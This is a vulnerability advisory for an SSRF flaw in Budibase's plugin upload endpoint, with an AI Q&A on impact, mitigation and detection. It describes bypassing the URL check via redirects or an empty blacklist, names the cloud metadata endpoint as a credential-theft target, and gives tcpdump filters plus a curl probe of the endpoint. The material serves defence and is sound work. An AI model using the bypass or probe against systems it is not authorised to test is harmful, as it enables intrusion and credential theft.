CVE-2026-45061
SSRF via Plugin URL Validation Bypass in Budibase
Publication date: 2026-05-27
Last updated on: 2026-05-27
Assigner: GitHub, Inc.
Description
CVSS Scores
EPSS Scores
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| budibase | budibase | < 3.35.10 (fixed in 3.35.10) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-918 | The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability affects Budibase, an open-source low-code platform, in versions prior to 3.35.10. The Plugin URL upload endpoint (POST /api/plugin) validates the submitted URL with a bare substring check for '.tar.gz': any URL that contains that string anywhere (in the query string or fragment, for example) passes, with no further validation of the scheme, host, or path.
The URL is then handed to the function that fetches the archive. Budibase does ship a default SSRF (Server-Side Request Forgery) blacklist that blocks private IP ranges, but there are two realistic ways around it: deployments where the blacklist has been emptied or is otherwise bypassed, and the case where the plugin fetch follows an HTTP redirect from an allowed external URL to an internal target, a hop the check on the submitted URL never sees.
The result is an SSRF: an attacker who can reach the endpoint can make the Budibase server issue requests on their behalf to internal or otherwise protected resources.
How can this vulnerability impact me?
This vulnerability can allow an attacker to perform Server-Side Request Forgery (SSRF) attacks by tricking the Budibase server into making unauthorized requests to internal or protected network resources.
Such SSRF attacks can lead to unauthorized access to internal systems, exposure of sensitive information, or interaction with internal services that are not meant to be publicly accessible.
The CVSS score of 7.7 reflects a high confidentiality impact, meaning sensitive data can be exposed; integrity and availability are rated as not affected.
What immediate steps should I take to mitigate this vulnerability?
The fix ships in Budibase 3.35.10; the immediate step is to upgrade to 3.35.10 or later.
Until you can upgrade, keep in mind that the weakness is the insufficient URL validation on the plugin URL upload endpoint, and that it becomes exploitable when the SSRF blacklist is bypassed or empty, or when an HTTP redirect leads to an internal target. Make sure the blacklist (BLACKLIST_IPS) is populated with loopback, RFC 1918 and link-local ranges (169.254.0.0/16 includes the cloud metadata endpoints from which IAM credentials are commonly stolen), and avoid letting the server follow redirects from untrusted URLs.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
CVE-2026-45061 is a Server-Side Request Forgery (SSRF) vulnerability that can allow attackers to access internal services and potentially steal sensitive data such as IAM credentials or database records.
Such unauthorized access to sensitive data could lead to violations of data protection regulations like GDPR or HIPAA, which require strict controls over personal and sensitive information.
Therefore, if exploited, this vulnerability may compromise compliance with these standards by exposing protected data to unauthorized parties.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection centres on two places: requests to the Plugin URL upload endpoint (POST /api/plugin) whose URL contains ".tar.gz" but is otherwise unusual (a non-https scheme, an IP-literal or internal hostname, or ".tar.gz" sitting in the query string or fragment rather than at the end of the path), and outbound connections from the Budibase server to addresses it should never be fetching plugins from.
Outbound HTTP requests from the Budibase server that land on internal IP addresses or private network ranges, in particular right after a redirect from an external host, are the clearest sign of exploitation.
Suggested commands to detect potential exploitation:
- Capture outbound connections from the Budibase host to private and link-local ranges with tcpdump or tshark. Plugin fetches over HTTPS are encrypted, so grepping for ".tar.gz" only works on plaintext port 80 traffic (use -F so the dot is matched literally):
  - tcpdump -i <interface> -nn 'src host <budibase-ip> and (dst net 10.0.0.0/8 or dst net 172.16.0.0/12 or dst net 192.168.0.0/16 or dst host 169.254.169.254)'
  - tcpdump -i <interface> -A 'tcp port 80' | grep -F '.tar.gz'
- Exercise the endpoint yourself, only on an instance you are authorised to test, with an archive URL on a host you control and confirm whether and where the fetch arrives. The request as written carries no credentials; the endpoint is authenticated, so add your Budibase session credentials to the call:
  - curl -X POST https://<budibase-server>/api/plugin -H 'Content-Type: application/json' -d '{"url":"https://<your-host>/test.tar.gz"}'
- Check Budibase server or reverse-proxy logs for POST requests to /api/plugin and, where the submitted URL is logged, inspect any URL containing ".tar.gz"; correlate the timestamps with outbound connections from the server to internal addresses.
Also review the BLACKLIST_IPS configuration: an empty or trimmed list removes the default protection, and a redirect that lands on an internal IP is a bypass indicator regardless of what the list contains.